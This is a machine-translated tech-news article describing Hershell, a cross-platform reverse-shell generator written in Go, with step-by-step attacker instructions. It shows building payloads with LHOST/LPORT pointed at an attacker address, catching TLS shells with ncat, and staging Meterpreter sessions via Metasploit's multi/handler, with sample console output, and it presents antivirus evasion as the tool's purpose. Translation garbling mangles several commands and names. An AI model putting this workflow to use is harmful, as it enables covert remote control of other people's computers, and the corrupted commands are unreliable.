Shulou(Shulou.com)05/31 Report--

Editor to share with you what kind of generator Hershell is, I believe most people do not know much about it, so share this article for your reference, I hope you can learn a lot after reading this article, let's go to know it!

Hershell is a powerful cross-platform reverse Shell generator. The tool is developed in GE language and realizes its function based on TCP reverse Shell.

The tool uses TLS to ensure the security of data communication, and provides certificate public key fingerprint binding function to prevent communication data from being intercepted.

Supported system

The current version of Hershell supports the following operating systems:

Windows

Linux

MacOS

FreeBSD

Development purpose

Although Meterpreter Payload can be used sometimes, this method can be easily detected by antivirus products. Therefore, Hershell arises at the historic moment, it can provide us with a reverse Shell based on TCP, and can support a variety of different operating system platforms.

Tool use & dependent components

Hershell is developed in the GE language. We first need to build the Go environment on our device according to the Go official manual and set the $GOPATH environment variable.

Next, run the following command to get the project source code:

Go get github.com/lesnuages/hershell to build Payload

When building a Payload, we can choose to use the provided Makefile to complete the build. At this point, we need to set the following environment variables:

GOOS: target operating system

GOARCH: target architecture

LHOST: attacker IP or host domain name

LPORT: listener port

Of course, we also provide some variable values for reference in Makefile:

Depends: generate server certificate (reverse Shell needs to be used)

Windows32: build a 32-bit Windows executable (PE 32-bit)

Windows64: build a 64-bit Windows executable (PE 64-bit)

Linux32: build a 32-bit Linux executable (ELF 32-bit)

Linux64: build a 64-bit Linux executable (ELF 64-bit)

Macos32: build a 32-bit macOS executable program (Mach-O)

Macos64: build a 64-bit macOS executable program (Mach-O)

For the target platform in the above list, we also need to set two environment variables, LHOST and LPORT.

Use reverse Shell

After the code starts executing, the tool will provide us with a remote Shell, which is a custom interactive Shell that allows us to execute system commands through cmd.exe on Windows or / bin/sh in Unix devices.

Some of the specific commands supported by Hershell are shown in the following table:

Run_shell: get system Shell

Inject: injects a shellcode (Base64 encoding) into the memory of the same process and executes the code.

Meterpreter [tcp | http | https] IP:PORT: establish a connection with multiple processors and get the second phase reverse TCP, HTTP, or HTTPS Meterpreter from Metasploit, and then execute Shellcode in memory (this feature currently only supports the Windows platform).

Exit: exit the program

Tool use

First, we need to generate a valid certificate using the following command:

$make dependsopenssl req-subj'/ CN=yourcn.com/O=YourOrg/C=FR'-new-newkey rsa:4096-days 3650-nodes-x509-keyout server.key-out server.pemGenerating a 4096 bit RSA private key.... . +. + + writing new private key to 'server.key'-cat server.key > > server.pem for Windows platform: # Predifined 32 bit target$ make windows32 LHOST=192.168.0.12 LPORT=1234# Predifined 64 bit target$ make windows64 LHOST=192.168.0.12 LPORT=1234 for Linux platform: # Predifined 32 bit target$ make linux32 LHOST=192.168.0.12 LPORT=1234# Predifined 64 bit target$ make linux64 LHOST=192.168.0.12 LPORT=1234 for macOS platform: $make The macos LHOST=192.168.0.12 LPORT=1234 tool uses the sample basic use

We can use a variety of tools to handle incoming connections, such as:

Socat

Ncat

Openssl server module

Various handler (python/shell_reverse_tcp_ssl payload) of Metasploit

Here is an example of the use of ncat:

$ncat-- ssl--ssl-cert server.pem-- ssl-key server.key-lvp 1234Ncat: Version 7.60 (https://nmap.org/ncat) Ncat: Listening on:: 1234Ncat: Listening on 0.0.0.0:1234Ncat: Connection from 172.16.122.105.Ncat: Connection from 172.16.122.105 Listening on 0.0.0.0:1234Ncat 47814. [hershell] > whoamidesktop-3pvv31a\ labMeterpreter scenario

Note: currently, this feature is only supported on the Windows platform.

The Meterpreter usage scenario of this tool currently supports only the following Payload:

Windows/meterpreter/reverse_tcp

Windows/x64/meterpreter/reverse_tcp

Windows/meterpreter/reverse_http

Windows/x64/meterpreter/reverse_http

Windows/meterpreter/reverse_https

Windows/x64/meterpreter/reverse_https

When you choose to use a Payload, don't forget to choose the correct transport port (tcp, http, or https).

Examples of MeterpreterHandler usage are as follows:

[14:12:45] [172.16.122.105] [Sessions: 0] [Jobs: 0] > use exploit/multi/handler [14:12:57] [172.16.122.105] [Sessions: 0] [Jobs: 0] exploit (multi/handler) > set payload windows/x64/meterpreter/reverse_httpspayload = > windows/x64/meterpreter/reverse_ https [14: 13:12] [172.16.122.105] [Sessions: 0] [Jobs: 0] exploit (multi/handler) > Set lhost 172.16.122.105lhost = > 172.16.122.105 [14:13:15] [172.16.122.105] [Sessions: 0] [Jobs: 0] exploit (multi/handler) > set lport 8443lport = > 8443 [14:13:17] [172.16.122.105] [Sessions: 0] [Jobs: 0] exploit (multi/handler) > set HandlerSSLCert. / server.pemHandlerSSLCert = >. / server.pem [14:13:26] [172.16.122.105] [Sessions: 0] [Jobs: 0] exploit (multi/handler) > exploit-j [*] Exploit running as background job 0. [*] [2018.01.29-14:13:29] Started HTTPS reverse handler on https://172.16.122.105:8443[14:13:29][172.16.122.105][Sessions: 0] [Jobs: 1] exploit (multi/handler) >

Next, in hershell, use the meterpreter command:

[hershell] > meterpreter https 172.16.122.105purl 8443

At this point, we will be able to get a new Meterpreter session in msfconsole:

[14:13:29] [172.16.122.105] [Sessions: 0] [Jobs: 1] exploit (multi/handler) > [*] [2018.01.29-14:16:44] https://172.16.122.105:8443 handling request from 172.16.122.105 (UUID: pqzl9t5k) Staging x64 payload (206937 bytes)... [*] Meterpreter session 1 opened (172.16.122.105) at 2018-01-29 14:16:44 + 0100 [14:16:46] [172.16.122.105] [Sessions: 1] [Jobs: 1] exploit (multi/handler) > sessionsActive sessions= Id Name Type Information Connection-1 meterpreter x64/windows DESKTOP-3PVV31A\ lab @ DESKTOP-3PVV31A 172.16.122.105 lab 8443-> 172.16.122.105 purl 44804 (10.0.2.15) [14:16:48] [172.16. 122.105] [Sessions: 1] [Jobs: 1] exploit (multi/handler) > sessions-I 1 [*] Starting interaction with 1...meterpreter > getuidServer username: DESKTOP-3PVV31A\ lab are all the contents of the article "what kind of generator is Hershell?" Thank you for reading! I believe we all have a certain understanding, hope to share the content to help you, if you want to learn more knowledge, welcome to follow the industry information channel!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.